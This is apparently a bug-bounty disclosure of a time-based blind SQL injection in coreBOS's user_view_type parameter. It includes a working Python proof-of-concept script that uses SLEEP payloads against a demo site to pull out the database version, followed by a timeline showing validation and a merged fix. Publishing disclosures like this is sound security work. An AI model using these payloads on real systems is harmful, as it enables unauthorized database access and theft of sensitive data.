SQL Injection in tsolucio/corebos


Reported on

Dec 20th 2021


coreBOS is vulnerable to Blind SQL Injections in parameter user_view_type which allows the attacker to execute SQL commands on the target database. it is a time-based attack in which the result of the query will be determined based on the time of the response.



Proof of Concept

// Blind_SQL.py
import requests

url = "https://demo.corebos.com/"
query = "index.php?module=Calendar4You&action=Calendar4YouAjax&file=Events&typeids=1,2,4,invite,Assets,Campaigns,Contacts,cbupdater,Invoice,Potentials,CobroPago,ProductComponent&usersids=&view=agendaWeek&event_status=&task_priority=&block_status={\"event_type\":\"block\",\"module_type\":\"block\",\"et_status\":\"block\",\"task_priority\":\"block\"}&save=&start=1639353600&end=1639958400"
Database_Version = []
for i in range(21):
    for x in range(46,58):
        payload = "&user_view_type=1+AND+(SELECT+8513+FROM+(SELECT(SLEEP(2-(IF(ascii(substr(version(),{},1))={},0,5)))))ZnYh)".format(i, x)
        c = {"democoreboscom":"86b8cecae7a5f8d1e2fa41116a7e1ffc"}
        r = requests.get(url+query+payload, cookies=c, timeout=20)
        if r.elapsed.total_seconds() > 2:
            print("[+] Character number {} == {}".format(i,chr(x)))

for i in Database_Version:
    print(i, end='')


This vulnerability is capable of retrieving sensitive information from the database target system.


the usersids is also vulnerable on the same request but exploited via a different payload.


We are processing your report and will contact the tsolucio/corebos team within 24 hours. 5 months ago
itsfading submitted a
5 months ago
We have contacted a member of the tsolucio/corebos team and are waiting to hear back 5 months ago
itsfading modified the report
5 months ago
We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. 5 months ago
5 months ago


any updates?

We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. 5 months ago
We have sent a third and final follow up to the tsolucio/corebos team. This report is now considered stale. 4 months ago
Joe Bordes validated this vulnerability 4 months ago
itsfading has been awarded the disclosure bounty
The fix bounty is now up for grabs
Joe Bordes confirmed that a fix has been merged on 2ce9f3 4 months ago
Joe Bordes has been awarded the fix bounty
SaveEventSettings.php#L13 has been validated
Events.php#L265-L277 has been validated
CalendarView.php#L231 has been validated
to join this conversation